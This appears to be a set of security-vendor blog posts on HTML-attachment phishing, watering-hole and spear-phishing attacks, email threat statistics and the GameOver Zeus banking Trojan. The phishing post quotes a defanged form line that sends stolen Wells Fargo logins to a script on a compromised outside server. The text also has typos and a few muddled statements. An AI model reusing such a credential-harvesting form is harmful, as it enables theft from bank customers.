HTML Attachment Phishing: What You Need to Know

Are you aware of HTML attachment phishing? It is one of the latest trends with cybercriminals. Instead of emailing downloaders that contact C7C servers to download crypto malware, Troijans, or other nasties, HTML attachments are being sent. HTML attachment phishing is less well known, and as a result, many people are falling for phishing scams.

Even though this past weekend was a holiday weekend for many, there is a good chance that you still checked your email fairly often. If you are like me, you typically use your phone or another mobile device to check your email on the go. This past weekend, you were probably multitasking and may not have been on high-alert for a fraudulent message while you were checking email in between hiding and finding Easter eggs.

Hackers know these things.

So, they send crafty messages like this one (shown as opened in the Thunderbird email client):

If you open that message on your phone, the attachment would probably download with the message, and all you have to do is click to view it. This is a little different than your typical phishing message; a typical phishing message contains a button that has an embedded link that takes you to a lookalike of your bank’s or another online service provider’s real web site.

In today’s example, the phishing page has been stored as a file that looks like the following in a desktop browser:

It will also load up in your phone’s browser, but Safari (or another browser) on your phone may just show you a truncated version of the Internet address you are visiting. When it is a local file, you may just see a portion of the name of the file, Wells_Fargo-Personal-Business_Banking.htm as on my iPhone below:

So, what can Wells Fargo do about that? You may think there is no phishing content to be taken down or removed because it seems encapsulated in the email message. You may think that nobody is harmed if you don’t reply or fall for logging in this way. However, some folks WILL reply, and there is fraudulent content on the Internet that can be referred by Wells Fargo to their takedown provider.

In the source code of the HTML attachment are instructions for how to handle the credentials that the victim enters. Below is a snippet of the code from this phishing attack:

<form id=”frmSignon” action=”hxxp://gospelvideo.com.br/wp-includes/images/smilies/zate.php” autocomplete=”off” method=”post” name=”signon”>

The highlighted portion is the path to a PHP script on a compromised server in Portugal that hosts a domain belonging to a Brazilian gospel video web site. Undoubtedly, if we could view the source code of that PHP script, we would see that is contains the email address of the criminal who is receiving the stolen Wells Fargo credentials. Wells Fargo wants to remove this fraudulent content before its customers can be victimized.

When we visit that page, we see that the PHP code redirects victims to what we call the “exit URL” which is a legitimate login page at Wells Fargo. The victim will then think that their login failed, and they will try to log in again. It is at that moment that Wells Fargo can recognize that customers who login there—having been referred from the gospelvideo.com.br URL—are customers who likely just gave up their authentication credentials and should have their accounts locked until the situation is rectified.

PhishMe provides the intelligence that enables Wells Fargo and other spoofed brands tackle this threat vector. Our PhishMe Intelligence system scans over two million spam messages daily to identify the messages that are delivering HTML attachments. Then we use our patented technology to automatically identify the file as a phishing attack and extract the relevant intelligence.

PhishMe digs deeper than other threat intelligence service providers to find the source of the attacks.  Learn more about how we can help you protect your brand here

Watering Holes vs. Spear Phishing

How Does A Watering Hole Attack Work?

Water holing attacks originate by compromising trusted websites and infecting the computers or other devices that visit that site. A successful watering hole attack casts a wide net and has the potential to compromise a large number of users across multiple organizations. This flood of information is a double-edged sword, as attackers have to parse through a large amount of data to find information of value. Additionally, these attacks often exploit zero-day vulnerabilities, so their increased popularity means attackers are burning through zero-days faster, and companies are responding faster as well, stopping attacks earlier in the kill-chain.

 These attacks are an effective tactic, that when executed properly, can deliver widespread damage on a large scale. Symantec released an excellent report describing the APT group “Hidden Lynx”, who the report describes as the inventors of the watering hole technique. The report details last year’s VOHO campaign, which targeted iOS developers, and impacted users at Facebook, Apple, and Twitter – showing the power of a water holing.

The Danger Of Indiscriminate Watering Hole Attacks

Instead of viewing indiscriminate watering-hole attacks as a replacement for spear phishing, they can be seen as an additional tool at adversaries’ disposal, which is what makes it so dangerous. Like all tools, spear phishing and watering hole attacks have specific strengths and weaknesses that suit them well for certain jobs while making them limited in other situations.

As described above, watering hole attacks gather huge amounts of data that attackers will have to sift through for useful information, thus slowing down their ability to take additional malicious action.

Spear phishing, on the other hand, offers attackers the ability to focus more on specific targets and information. A successful spear phishing attack provides immediate access to a target’s systems. Given the amount of readily available information on organizations and their employees on the Internet, attackers can easily identify targets and craft seemingly genuine emails that will provide gateways to specific systems and ultimately data. Spear phishing can exploit zero-days to drop malware on a host, but it doesn’t rely on vulnerabilities. Simple social engineering tactics have allowed groups such as the Syrian Electronic Army to carry out a multitude of high-profile attacks.

“Spear phishing offers attackers the ability to focus more on specific targets and information.”

Anecdotal evidence continues to highlight spear phishing as the source of most high-profile breaches. As previously mentioned, spear phishing is the attack method of choice for the Syrian Electronic Army. Brian Krebs also reported that the Target breach started with a spear phishing email that unloaded malware and stole login credentials from Target vendor Fazio Mechanical.

The fact that news reports around watering hole attacks are stating “watering-hole usage” rather than “company x compromised by watering hole attack” indicates that either companies aren’t discussing successful campaigns, or that the attackers are still refining their tactics. Even if they are successful, the attackers may be inundated with information and are still deciding whether they have found anything useful.

There’s no denying that watering-hole attacks are making an impact, but the idea that it is replacing spear phishing is erroneous. While Symantec’s 2014 Internet Security Threat Report notes a decrease in the overall volume of spear phishing emails, the number of campaigns increased by 91%. Adversaries aren’t turning away from spear phishing as an attack method; instead they are sharpening the focus of their attacks. Symantec attributes this to growing user awareness (we’d like to take some credit for that), but it is probably also due to the dynamics discussed above.

For casting a wider net intended to compromise a large number of users, watering-hole attacks are an effective tactic, but for a highly focused attack seeking specific information, a well-crafted spear phish is still an adversary’s best weapon.

Cyber Chess: How You Can Win

Most of us are not very good at playing chess – if we play at all.  However, many of us at least have some familiarity with the game. The following quick description will help in the discussion of Cyber Chess – the game the good guys (white pieces) “play” against the cybercriminals (black pieces) as they try to steal anything we value from our cyber world.

The chess game is described in three phases.

The Opening:  During the opening, you and your opponent make several moves to establish a battlefront.

The Middle Game:  The middle game is the direct battle zone. This phase is spent attacking, being attacked, defending and looking for ways to stabilize your defenses or cripple your opponent and break down his/her defenses.

The End Game: This is where the game comes to a conclusion when, excluding the occasional draw, you either win or you lose to your opponent, Checkmate!

Simple enough, right?  And it is, all you have to do is checkmate your opponent – i.e., capture their king more or less. Of course, there are those who would argue that it is not that simple. They say you have to be really smart and know a lot! They point to the fact that for just the first four moves in a chess game, there are 318,979,564,000 possibilities. For the first ten moves, the number is 169,518,829,100,544,000,000,000,000,00. After that, the numbers start to get big, with the total possible moves in the neighborhood of 10120 or 1 followed by 120 zeros – quite a big neighborhood!  Hmmm, maybe they have a point.

Chess is a game of extremely big numbers of possible moves. Cybercrime is a “game” of very big numbers.  Annually-

  • 26,280,000,000,000 malicious e-mails sent
  • 2,628,000,000,000 get through current defenses
  • 13,140,000,000 are effective

To be clear, Cyber Chess is not “a” game. It is thousands and millions of concurrent games rolled into a continuous stream of threats to which we must respond – in other words, we must “play.”  So, the answer to the “Do You Play?” part of the title question is yes, you do play.  You may not want to play, you may not know how to play, but like it or not, you are definitely in the game!

The Cyber Chess opening begins with criminals sending out nearly 75,000,000,000 malicious messages (spam, phishing, malware) every day. Your opening moves are probably to make sure your antivirus (AV) software is updated and that your various network devices are current with respect to known threats.  Assessment of the opening game:  Advantage Black.

The middle game plays out with your defenses blocking what they can and with the cybercriminals taking what they can get in terms of successfully getting into one or some of your users’ computers and then into your network.  Using an industry average figure of 1 in 200 attacks being successful, and assuming your company has maybe 1000 users, that means that on average 5 of your users will fall victim to an attack that made its way past your defenses.  Of course, all it takes is one successful compromise to allow the criminal to take up residence inside your network. Does this really happen that often considering the money companies spend on cyber defense? If you ask Target, Niemen Marcus, Franciscan Health, dozens of universities, and hundreds of other companies, it absolutely does happen!  From the 2013 Verizon Data Breach Report:

  • There were more than 47,000 security incidents reported
  • Resulting in 621 data breaches
  • Email attacks were the primary mechanism to deploy malware into enterprises either directly or indirectly.   (Figure 20/pg 29 of the report)
  • 67% of the time in large enterprises, email was the direct vector
  • And still more often, malicious email was the mechanism by which bad guys gained access to a computer and then directly installed malware on it.
  • Of the 621 data breaches, how did companies find out? (pg 54 of the report)
  • Only 4% were detected by Network IDS (Intrusion Detection Systems)
  • Only another 4% were detected by analyzing log files
  • Anti-Virus programs didn’t detect any of them!
  • Most companies learned about their data breach from an external source
  • Examples: Customers, law enforcement. This happened 70% of the time.  (pg 53 of the report)

It is also interesting to note that the average time between when a breach occurs and when a company detects it has been breached is about 210 days (Trustwave). That’s a long time that the criminal has to develop his or her “middle game,” solidifying their presence in your network and positioning for a win in the end game.  Of course, they are taking your “pieces” all along the way.

Significant in all of this is that according to the Verizon report, none, zip, zilch, nada, of the breaches were detected by Antivirus programs. That is truly comforting news – for the cybercriminal.  Assessment of the middle game: Advantage Black

The End Game.  Unfortunately, there is not end to this game, at least not an end that anyone can foresee from the present state. For a long time, we will be forced to play the middle game in response to a continuous assault of opening moves by the bad guys.  Can you play the game using yesterday’s tools and yesterday’s strategies and tactics?  Absolutely you can!  Can you win the game doing that?  Absolutely you cannot!

Cybercriminals continuously evolve their tools and tactics to improve their success based on what they learn about their enemy, about us. Theirs is an intelligence-based approach and when they see that something is not working, they make changes.  Too many of us continue to put our faith in things that might have worked in the past, but that we know, in our minds and hearts, are no longer effective.  Why is that so?  For one thing, antivirus companies continue to sell the message that they protect us from bad things, and they do. The problem is that they do not protect us from the worst things and even when they finally do, it often is too late.  The other problem is that for such a long time, we have been conditioned to think in a compliance-based way.  If we follow the rules and regulations and do we have been doing, and use the updated versions of yesterday’s weapons, we will be okay.

The question to ask at this point is ”How is that working for us?” Given that daily reports of breaches would fill several pages of the daily newspaper, the honest answer has to be “Not very well.” A casual review of the 2013 Verizon Data Breach Report already gives us the answer.  The new question is “What can we do to get better at the game and have some hope of eventually winning?”

The new answer is that we must shift away from believing the well-intended but misguided idea that others can protect us with outmoded tools while we blissfully go about our business.  We must realize that today’s solutions to today’s criminal attacks are found in actionable intelligence and proactive intervention.

What this means is that we must employ actionable cybersecurity intelligence and forensic analysis about email-based threats (phishing, spam and malware) that identify, prioritize and target cybercriminal activities and provide effective countermeasures. This includes the ability to identify the root sources of cybercrime attacks (servers, perpetrators, locations, etc.), obtaining rich actionable intelligence information about cross-brand attacks and targeted attacks, as well as advanced notification of emerging email-based threats.  Only then will we be able to respond effectively to attacks on our brands, and to disrupt email-based threats against us.  Only then will we be able to improve our game.

Cyber Chess – Do You Play?  Yes, you don’t have a choice.

Can you win?  Perhaps, but not by continuing to play yesterday’s game.

Assessment of the end game: It’s up to you.  Your Move!

Why Do We Treat Cybercrime Differently than Real-Life Crime?

What would you do if you were the victim of a crime? For example, what if you walk out to your car after work and find the window smashed and the stereo stolen? Wouldn’t you call the police?

Imagine that, this weekend, you’re leaving a bar with some friends. A man walks up, points a gun at you and demands your wallet. You’d call the police, right?

Now pretend you receive an email saying that the bank needs you to reset your password. You go to the provided website in the email and the next time you check your balance there’s $500 missing. Who would you call?

The bank, right?

Our first inclination is to call the police when we’re the victims of crime in real life. Why do we treat cybercrime differently than any other type of crime?

When it comes to punishing cybercriminals, the biggest obstacle is that they’re usually too far away from their victims. Even if they’re caught, the court fees, travel expenses to the court, and lodging normally outweigh the amount stolen. It’s easier to just call the bank and try to get your money back. While this isn’t exactly “right”, it’s currently the easiest course of action when dealing with online theft.

Another problem is how the general populace treats cybercrime. When a victim’s front door is kicked in and their house robbed, we immediately blame the criminal. When your online banking information is stolen, we typically point the finger at the victim and scold them for not having the most up-to-date antivirus software or firewall.

In terms of reporting criminal activity, the government does have laws that say we should report every crime to the Department of Justice. Crimes like burglary, aggravated assault, and murder are measured. They do not measure cybercrime. There’s not even a box to check in regards to online theft on a police report.

So why are they not tracking that? Semantics say that there are 18 new victims of cybercrime every second. In 2012, nine million Americans fell victim to fake bank websites, 19 million Americans had money taken off their credit cards without authorization, and 43% of Americans are still experiencing heavy volumes of spam. These seem like pretty steep numbers to not take in account.

In order to change this, we need to embrace the idea that if we see something, we say something.  When cybercrime happens, call the police. If they don’t respond the way you think they should, notify elected officials about the crime. Take the issue to congressmen, senators, governors, DAs and the Attorney General. It needs to be known that we want justice against these crimes and it needs to start with the victim.

How do you think that we can improve enforcement around cybercrime? Share your comments below.

Learn more about this topic by watching Gary’s presentation at TEDx Birmingham here.

GameOver Zeus: Three Things You Should Know

The Zeus banking Trojan is a popular topic in the security world these days. It’s not new, but it still garners attention as one of the most successful and prolific Trojans in use today.

Banking Trojans hide on infected machines and intercept activity related to the user’s finances—bank account logins, investment information, even purchases on sites like eBay. This differs from phishing. With phishing, an end user is infected with a banking Trojan like Zeus, but they are not directed to a fake website and made to believe they are logging in to an official website.

Instead, he or she is interacting with the real banking, investing, or retail website and is completing a legitimate transaction. However, while that activity takes place, keystrokes are being logged. Screenshots may even be taken and transmitted to the attackers C&C server. Usernames, passwords, security questions are all being monitored and recorded and transmitted to the attackers. All of these malicious actions occur silently. Once infected, there will be no sign that an Internet sessions is anything but private.

Since the 2010 leak of the Zeus source code, a host of Zeus variants has been unleashed on an unsuspecting public. Cybercriminals leaped at the opportunity to diversify both the traits and abilities of the Zeus Trojans, building their own variants. Some of those Zeus variants —such as Ice IX and Citadel—have garnered attention for their huge successes.

Perhaps the most successful Zeus variant to date, GameOver Zeus, was responsible for 38% of banking Trojan activity in 2013. In this post, we’ll explore three things that you need to know about GameOver Zeus.

#1: The difference between GameOver Zeus and other Zeus variants.

While other prominent Zeus variants – and their associated botnets – rely on centralized command and control infrastructure, GameOver uses a distributed peer-to-peer botnet. This means instructions can come from virtually any other infected machine. That is part of the reason for the success of the Trojan. Nailing down the all-important points of origin for these instructions is incredibly difficult, if not nearly impossible.

#2: GameOver Zeus is the most versatile Zeus Variant.

GameOver Zeus is the most versatile of the Zeus variants and enjoys the advantage of being distributed via email attachments and downloaders, or through URLs in emails that point to online exploit kits. Those same exploit kits are also used in drive-by attacks on the Web, and via malvertising that directs traffic to the sites. Regardless of the online medium, GameOver can utilize an attack vector to gain a foothold in your system.

Once a machine is infected, it can receive instructions to download even more malicious payloads: Other malware that can perform a much wider range of malicious actions. PhioshMe has observed the GameOver botnet distributing malware aimed at generating more malware-laden spam, stealing Bitcoin and other cryptocurrency wallets from an infected machine, as well as downloading CryptoLocker. CryptoLocker is ransomware that encrypts a wide range of files on the infected machine, rendering it unusable until a ransom payment is made. All photos, documents, databases, images, and other important files are locked with powerful, unbreakable encryption.

#3: Recent changes have made it more likely for Zeus to infect a machine on your network.

Last September, PhishMe saw GameOver’s distributors begin using the Upatre malware downloader—a downloader which served largely as a replacement for the more substantial Pony Loader that was largely abandoned following the fall of the Blackhole exploit kit.

Upatre capitalizes on leaving a smaller footprint and utilizes simple, yet effective encryption techniques to hide the GameOver infection process. This more sophisticated and nuanced approach makes less “noise” in infected systems and utilizes “throw-away” distribution resources.  This variation in the way GameOver is distributed makes it much more difficult for the average user to avoid becoming infected with the Zeus Trojan, by reducing the likelihood that he or she will notice anything out the ordinary is happening.

In just the past two months, the developers of GameOver Zeus have implemented additional functionality to make their malware more persistent and harder to detect. This includes the addition of rootkit functionality borrowed from the prominent Necurs rootkit to prevent removal of the malware. Steps are also taken to prevent any potential future botnet sinkhole attempts.

Cybercriminals are, and always have been, persistent, savvy, and dynamic. Their continued development of GameOver serves to underscore all three of those traits. However, this malware clearly shows that they are also successful.

How has GameOver Zeus affected your business? Tell us what else you think business leaders should know about GameOver Zeus in the comments section below.